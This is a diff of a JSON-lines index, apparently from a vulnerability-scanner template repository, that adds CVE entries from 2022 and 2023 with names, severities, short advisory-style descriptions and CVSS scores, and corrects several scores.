{"ID":"CVE-2022-2633","Info":{"Name":"All-In-One Video Gallery \u003c=2.6.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-2633.yaml"}
|
||||
{"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26352.yaml"}
|
||||
{"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"}
|
||||
{"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"}
|
||||
{"ID":"CVE-2022-26833","Info":{"Name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","Severity":"critical","Description":"An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2022/CVE-2022-26833.yaml"}
|
||||
{"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-26960.yaml"}
|
||||
{"ID":"CVE-2022-2733","Info":{"Name":"Openemr \u003c 7.0.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2733.yaml"}
|
||||
{"ID":"CVE-2022-2756","Info":{"Name":"Kavita \u003c0.5.4.1 - Server-Side Request Forgery","Severity":"medium","Description":"Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-2756.yaml"}
|
||||
|
@ -1734,6 +1744,7 @@
|
|||
{"ID":"CVE-2022-29006","Info":{"Name":"Directory Management System 1.0 - SQL Injection","Severity":"critical","Description":"Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29006.yaml"}
|
||||
{"ID":"CVE-2022-29007","Info":{"Name":"Dairy Farm Shop Management System 1.0 - SQL Injection","Severity":"critical","Description":"Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29007.yaml"}
|
||||
{"ID":"CVE-2022-29009","Info":{"Name":"Cyber Cafe Management System 1.0 - SQL Injection","Severity":"critical","Description":"Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29009.yaml"}
|
||||
{"ID":"CVE-2022-29013","Info":{"Name":"Razer Sila Gaming Router - Remote Code Execution","Severity":"critical","Description":"A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29013.yaml"}
|
||||
{"ID":"CVE-2022-29014","Info":{"Name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","Severity":"high","Description":"Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-29014.yaml"}
|
||||
{"ID":"CVE-2022-29078","Info":{"Name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","Severity":"critical","Description":"Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-29078.yaml"}
|
||||
{"ID":"CVE-2022-29153","Info":{"Name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","Severity":"high","Description":"HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-29153.yaml"}
|
||||
|
@ -1796,6 +1807,7 @@
|
|||
{"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32409.yaml"}
|
||||
{"ID":"CVE-2022-3242","Info":{"Name":"Microweber \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3242.yaml"}
|
||||
{"ID":"CVE-2022-32429","Info":{"Name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","Severity":"critical","Description":"MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32429.yaml"}
|
||||
{"ID":"CVE-2022-32430","Info":{"Name":"Lin CMS Spring Boot - Default JWT Token","Severity":"high","Description":"An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-32430.yaml"}
|
||||
{"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32444.yaml"}
|
||||
{"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32770.yaml"}
|
||||
{"ID":"CVE-2022-32771","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32771.yaml"}
|
||||
|
@ -1879,6 +1891,7 @@
|
|||
{"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40881.yaml"}
|
||||
{"ID":"CVE-2022-4117","Info":{"Name":"WordPress IWS Geo Form Fields \u003c=1.0 - SQL Injection","Severity":"critical","Description":"WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4117.yaml"}
|
||||
{"ID":"CVE-2022-4140","Info":{"Name":"WordPress Welcart e-Commerce \u003c2.8.5 - Arbitrary File Access","Severity":"high","Description":"WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-4140.yaml"}
|
||||
{"ID":"CVE-2022-41412","Info":{"Name":"perfSONAR 4.x \u003c= 4.4.4 - Server-Side Request Forgery","Severity":"high","Description":"An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2022/CVE-2022-41412.yaml"}
|
||||
{"ID":"CVE-2022-41441","Info":{"Name":"ReQlogic v11.3 - Cross Site Scripting","Severity":"medium","Description":"ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-41441.yaml"}
|
||||
{"ID":"CVE-2022-41473","Info":{"Name":"RPCMS 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-41473.yaml"}
|
||||
{"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c=2.7.7 - Local File Inclusion","Severity":"critical","Description":"Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-41840.yaml"}
|
||||
|
@ -1958,6 +1971,7 @@
|
|||
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
|
||||
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
|
||||
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
|
||||
{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"}
|
||||
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
|
||||
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
|
||||
{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"}
|
||||
|
@ -1972,6 +1986,7 @@
|
|||
{"ID":"CVE-2023-0602","Info":{"Name":"Twittee Text Tweet \u003c= 1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0602.yaml"}
|
||||
{"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"}
|
||||
{"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"}
|
||||
{"ID":"CVE-2023-0678","Info":{"Name":"PHPIPAM \u003cv1.5.1 - Missing Authorization","Severity":"medium","Description":"In phpIPAM 1.5.1, an unauthenticated user could download the list of high-usage IP subnets that contains sensitive information such as a subnet description, IP ranges, and usage rates via find_full_subnets.php endpoint. The bug lies in the fact that find_full_subnets.php does not verify if the user is authorized to access the data, and if the script was started from a command line.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-0678.yaml"}
|
||||
{"ID":"CVE-2023-0777","Info":{"Name":"modoboa 2.0.4 - Admin TakeOver","Severity":"critical","Description":"Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0777.yaml"}
|
||||
{"ID":"CVE-2023-0900","Info":{"Name":"AP Pricing Tables Lite \u003c= 1.1.6 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0900.yaml"}
|
||||
{"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"}
|
||||
|
@ -2016,7 +2031,7 @@
|
|||
{"ID":"CVE-2023-22515","Info":{"Name":"Atlassian Confluence - Privilege Escalation","Severity":"critical","Description":"Atlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22515.yaml"}
|
||||
{"ID":"CVE-2023-22518","Info":{"Name":"Atlassian Confluence Server - Improper Authorization","Severity":"critical","Description":"All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22518.yaml"}
|
||||
{"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"low","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"2.7"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"}
|
||||
{"ID":"CVE-2023-22527","Info":{"Name":"Atlassian Confluence - Remote Code Execution","Severity":"critical","Description":"A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-22527.yaml"}
|
||||
{"ID":"CVE-2023-22527","Info":{"Name":"Atlassian Confluence - Remote Code Execution","Severity":"critical","Description":"A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22527.yaml"}
|
||||
{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"}
|
||||
{"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"}
|
||||
{"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"}
|
||||
|
@ -2042,6 +2057,7 @@
|
|||
{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"}
|
||||
{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
|
||||
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
|
||||
{"ID":"CVE-2023-25194","Info":{"Name":"Apache Druid Kafka Connect - Remote Code Execution","Severity":"high","Description":"The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-25194.yaml"}
|
||||
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
|
||||
{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"}
|
||||
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
|
||||
|
@ -2067,7 +2083,7 @@
|
|||
{"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"critical","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"}
|
||||
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
|
||||
{"ID":"CVE-2023-27639","Info":{"Name":"PrestaShop TshirteCommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27639.yaml"}
|
||||
{"ID":"CVE-2023-27640","Info":{"Name":"PrestaShop tshirtecommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27640.yaml"}
|
||||
{"ID":"CVE-2023-27640","Info":{"Name":"PrestaShop tshirtecommerce - Directory Traversal","Severity":"high","Description":"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27640.yaml"}
|
||||
{"ID":"CVE-2023-2766","Info":{"Name":"Weaver OA 9.5 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2766.yaml"}
|
||||
{"ID":"CVE-2023-2779","Info":{"Name":"Super Socializer \u003c 7.13.52 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2779.yaml"}
|
||||
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
|
||||
|
@ -2144,6 +2160,7 @@
|
|||
{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"}
|
||||
{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
|
||||
{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"}
|
||||
{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"}
|
||||
{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"}
|
||||
